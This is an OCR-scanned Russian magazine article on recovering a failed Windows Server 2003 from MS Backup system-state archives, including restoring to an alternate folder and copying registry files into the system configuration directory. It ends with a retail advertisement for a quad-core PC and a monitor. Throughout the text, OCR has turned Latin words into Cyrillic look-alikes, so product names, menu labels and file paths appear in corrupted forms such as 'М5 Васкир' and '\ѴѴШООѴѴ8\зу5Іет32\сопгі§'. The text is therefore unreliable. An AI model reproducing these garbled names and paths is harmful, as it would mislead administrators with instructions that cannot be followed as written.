Система глючит, работает нестабильно, но все-таки загружается, позво- 
ляя нам запустить М5 Васкир и выполнить откат к стабильному архиву. 
Если же ѴѴіп2кЗ зависает или выбрасывает голубой экран на стадии 
загрузки, попробуй при запуске нажать <Р8> и выбрать 5аіе Мобе (или 
5аіе Мобе \ѵіиЪ ИеШогкт§, если хранишь архивы на отдельном сервере, 
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Зосстановление состояния системы из Ьк(-архива в исходную локацию 



как, например, поступает мыщъх) . Также можно попробовать выбрать 
пункт ЬазТ Кпо\ѵп Соосі Сопгі§игагіоп («Загрузка последней удачной 
конфигурации») . 

В общем, нужно любым способом добиться загрузки системы. После 
этого запускай піЪаскир и не мешкая (ведь система может упасть в 
любой момент) переходи к вкладке КезШге апб Мапа§е Мебіа («Вос- 
становление и управление носителями»). Здесь находится перечень 
всехЪкІ-архивов с описаниями и метками, которые мы только успели 
создать. Достаточно распахнуть соответствующую ветвь в левом 
окне, выбрав самый свежий архив, и установить галочку напротив 
Зузіет Зіаіе. По умолчанию архив ищется в той локации, где он был 
создан, но мы можем изменить путь, нажав кнопку Вгоѵѵзе и указав, к 
примеру, лазерный диск (примечание: для ускорения процедуры вос- 
становления рекомендуется предварительно скопировать Ъкі-файл с 
СВ/ВѴВ на НПО). 

В поле «КезШге Шез іо:» («Куда восстанавливать») оставляем значение по 
умолчанию — Огі§іпа1 Іосаііоп («Исходная локация») и нажимаем кнопку 
ЗіаП КезШге, запуская процесс восстановления. 

После перезагрузки мы получаем нормально работающую систему. 

ТЯЖЕЛЫЕ СЛУЧАИ ВОССТАНОВЛЕНИЯ 

Представим себе, что система не загружается. Ну не загружается и все тут! 
Хоть грызи свой хвост, хоть бейся зубами об лед! Большинство админист- 
раторов, вылакав пол-литра корвалола, просто переустанавливают Винду 
поверх старой или — даже страшно сказать — с нуля, забыв о том, что М3 
Васкир (который все ругают!) можетускорить эту работу в сотни раз! 
Находим машину с любой стабильно работающей ИТ-подобной 
системой (ѴѴіп2к, ѴѴіпХР, \Ѵіп2кЗ) . Вставляем туда СПД)ѴЛ с архивом, 
запускаем М5 Васкир, переходим во вкладку КезШге апб Мапа§е Мебіа 
и (внимание!) в поле «КезШге Шез Ш:» выбираем пункт Аііегпаііѵе 
Іосагіоп («Альтернативное размещение»), указав любую папку, напри- 
мер С:\ТЕМР\5егѵег2003. Нажимаем Зіагі КезШге и получаем копию 
системы, только в другом месте. 

Теперь подумаем, как перетащить все эти файлы на восстанавливаемый 
\Ѵіп2кЗ. Решения на самом деле всего три. Первое — снять жесткий диск с 
сервера и подключить его к рабочей машине вторым, после чего скопиро- 
вать все файлы из папки 5егѵег2003 в каталоги ѴѴіпбоѵѵз и (опционально) 
Рго^гат Рііез. Внимание: файлы пібеіесі.сот и піЫг должны находиться 
в строго определенных местах диска, и потому их лучше не копировать, 
иначе система вообще перестанет загружаться. 

Естественно, если на сервере установлен хитрый 5С5І или КАЮ, то 
подключить его к рабочей станции не удастся, и в этом случае придется 
воспользоваться ЬіѵеСО, поддерживающим ИТР 5 (например, Кпорріхили 
ѴѴіпбоѵѵз РЕ). 

Если же КАШ настолько хитрый, что его не видит даже ІлѵеСИ, то к рухнув- 
шему серверу подключаем еще один жесткий диск, устанавливаем на него 



ѴѴіп2кЗ (со всеми необходимыми ЗСЗІ/КАГО-драйверами), перетягиваем 
туда по сети или через СБ/ШУЕ) разархивированные файлы и осуществля- 
ем перезапись. 

Как показывает практика, в подавляющем большинстве случаев для 
восстановления системы достаточно переписать всего лишь реестр 
и классы, находящиеся в папках: \Іетр\зегѵег-2003\Ке§ізігу и 
\Іетр\зегѵег-2003\СОМ+ Сіазз Ке§ізІгаІіоп БаІаЬазе. Скопируй их 
в каталог \ѴѴШООѴѴ8\зу5Іет32\сопгі§ поверх уже существующих 
файлов и перезагрузись. 

Вот, собственно говоря, и все. При правильной организации вопро- 
са восстановление системы, которая даже не загружается, занимает 
не более 10-15 минут, расходуемых главным образом на распаковку 
Ъкі-архива. Если же эту операцию выполнить заблаговременно, 
то на загрузку с ІлѵеСО с последующим копированием реестра не 
уйдет и пяти минут! 

ЗАКЛЮЧЕНИЕ 

Рассмотрев вопросы, связанные с восстановлением системы, мы 
оставили за бортом проблему архивации пользовательских данных 
и документов, также решаемую посредством М3 Васкир, причем не 
только в ручном режиме, но и, например, по расписанию. Однако 
стратегия резервирования пользовательских данных выходит далеко 
за рамки темы нашего сегодняшнего разговора и определяется глав- 
ным образом политикой компании. Кто-то предпочитает держать все 
документы на сервере, используя системы контроля версий, не только 
обеспечивающие банальную архивацию, но и хранящие историю 
изменений, что крайне важно при совместной работе с документами. 
Другие же хранят документы на рабочих станциях пользователей. 
Глупость, конечно, вернее, не глупость, а огромная головная боль для 
администратора, но именно благодаря ей создается децентрализо- 
ванная система, способная функционировать даже при крахе сервера. 
В общем, вариантов много. А М3 Васкир — всего лишь архиватор со 
встроенным планировщиком. Но для поддержания сервера на плаву 
ничего другого и не надо! И-И 



Что находится 
внутри системного 
архива 

Чтобы лучше понять возможности (и ограничения!) М3 Васкир, необ- 
ходимо знать, какие именно файлы она резервирует при сохранении 
системы: 

• некоторые ветви реестра, сосредоточенные в файлах зузіет, 
зоігѵѵаге, зесигііу, зат, беіаиіі, СотКе§ОЪ.Ъак, образующие ветвь 
НКЕУ_ЬОСАЬ_МАСНІЫЕ (остальные ветви реестра не сохраняются) ; 

• практически все содержимое папок 5у1ет32 и Зузіет (стратегия 
отбора файлов не совсем понятна, похоже, берутся все жизненно 
необходимые компоненты плюс некоторые файлы, относящиеся к 
установленным приложениям сторонних разработчиков); 

• некоторые важнейшие файлы и папки из каталога ѴѴіпсІоіѵз (напри- 
мер, АррРаІсЬ, тза^епі, МІСКОЗОРТ.ИЕТит.д.); 

• отдельные файлы и папки из каталога РКОСКАМ РІЬЕЗ (например, 
СОММОЫ РІЬЕЗ, Іпіегпеі Ехріогег, ОиІІоокЕхргезз и т.д.); 

• содержимое каталога КЗА\МасЫпеКеуз из папки БОСЫМЕМТЗ 
АШ ЗЕТТШСЗХАЬЬ Ы5ЕК5ХАРРПСАТЮ1Ч ОАТА\МІСКОЗОРТ\ 
СКУРТО, содержащее ключи шифрования (если, конечно, таковые 
имеются) . 

Остальные файлы (в том числе и пользовательские учетные 
записи) не сохраняются, хотя ничего не мешает указать их 
вручную, проставив соответствующие галочки напротив папок 
ООСЫМЕИТЗ АИО 5ЕТТШС5\ < Имя пользователя > . 
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Компьютер Н.ЕХТПОИ® ОиаНго 

на базе процессора Іпіеі® Соге™2 Оиасі 

работает за четверых! 




Процессор 4 х 2,4СНг 
Іпіеі® Соге™2 Оиасі 06600 



2СВ РРКІІ 667МНг 



3200 В 5АТА I 



ІМѴЮІА 8600ѲТ 256М 



ОѴОіПѴѴ 



СагсІ Кеасіег АП-іп-1 



АЗСОТ 6АК6 АТХ 450 ѴѴ 



ѴѴІпсІоѵѵз® Ѵізіа™ Ноте 



ІЕЕЕ 1394а ■ 8 ЫЗВ 2.0 
Ехі ЗАТАИ ■ СідаЫІ ЬАЫ 
ЗИ-КеасІу ■ ОігесіХІО 
РигеѴісІео™ Нй 




20 " 



1680x1050 (РиІІ НО) 



2 тз 



3000:1 



1607160” 



9 400 р. 
5АМ5ШМС 



ЗупсМазІег 206ВѴѴ 



25 990 р. 

РІ.ЕХТРЮЫ® ОиаНго 



Элегантный монитор с великолепным качеством изображения. Минималис- 
тский дизайн корпуса из глянцевого пластика со стильной кнопкой включе- 
ния украсит Ваш рабочий стол. Быстрая ЖК- панель со временем отклика 
2 мс и динамической контрастностью 3000:1 обеспечит великолепное качест- 
во изображения в компьютерных играх, фильмах или мультимедийных при- 
ложениях. 



4 причины почему стоит купить ГІ.ЕХТАОЫ® ОиаНго сегодня: 



О Четырехъядерный процессор Іпіеі® Соге™2 Оиасі обеспечивает высочайшую ско- 
рость выполнения ресурсоемких задач в многозадачных средах и максимальную про- 
изводительность многопоточных приложений. Они изменят Ваше представление о ра- 
боте на компьютере. Сделайте первый шаг в новом мире четырехъядерных процессо- 
ров и ощутите настоящую производительность многопоточных приложений. 



В Графический процессор ЫѴЮІА® ѲеРогсе® 8600 изменит Ваши впечатления от ком- 
пьютерных игр. Обладая революционной унифицированной архитектурой и полной под- 
держкой игр Місгозоіі® ЭігесіХ® 10, ОеРогсе 8600 обеспечивает беспрецедентную про- 
изводительность для построения сцен с экстраординарной детализацией и игровые эф- 
фекты кинематографического качества. 



Е] Операционная система ѴѴІпсІоѵѵз® Ѵізіа™ Ноте Ргетіит перевернет Ваши пред- 
ставления о развлечениях на домашнем компьютере. ѴѴІпсІоѵѵз® Ѵізіа™ Ноте Ргетіит 
содержит ѴѴІпсІоѵѵз® Месііа Сепіег, что облегчает работу с цифровыми фотографиями, 
ТВ, фильмами и музыкой. Интерфейс ѴѴІпсІоѵѵз® Аего - это не только динамические от- 
ражения, плавная анимация, полупрозрачные строки меню и возможность переключать- 
ся между открытыми окнами с использованием новой трехмерной структуры, но и па- 
нель мгновенного поиска и новые способы организации данных, которые позволяют 
мгновенно находить и использовать сообщения электронной почты, документы, фото- 
графии, музыку. 



О Компания "Ф-Центр", благодаря сотрудничеству с компаниями Іпіеі, Місгозоіі и 
МѴЮІА, объединила в компьютере ПЕХТРОИ® Оиаііго не только передовые техничес- 
кие достижения, но и специальные ценовые предложения, что дает нам возможность 
предложить Вам этот замечательный в техническом отношении компьютер по беспре- 
цедентно низкой цене - 25 990 рублей, что фактически на 10 тысяч рублей ниже сущес- 
твующих на рынке цен! 



со 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



"Бабушкинская", ул. Сухонская, 7 А 
"Улица 1905 года", ул. Мантулинская, 2 
"Владыкино", Алтуфьевское ш., 16 



Единая справочная: (495) 105-64-47 



Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо Ьо^о, Соге Іпзісіе, Іпіеі, Іпіеі І_о|о, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе І-О^о, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Хеоп, и Хеоп Іпзісіе 
являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениями на территории США и других стран. 



Реклама 







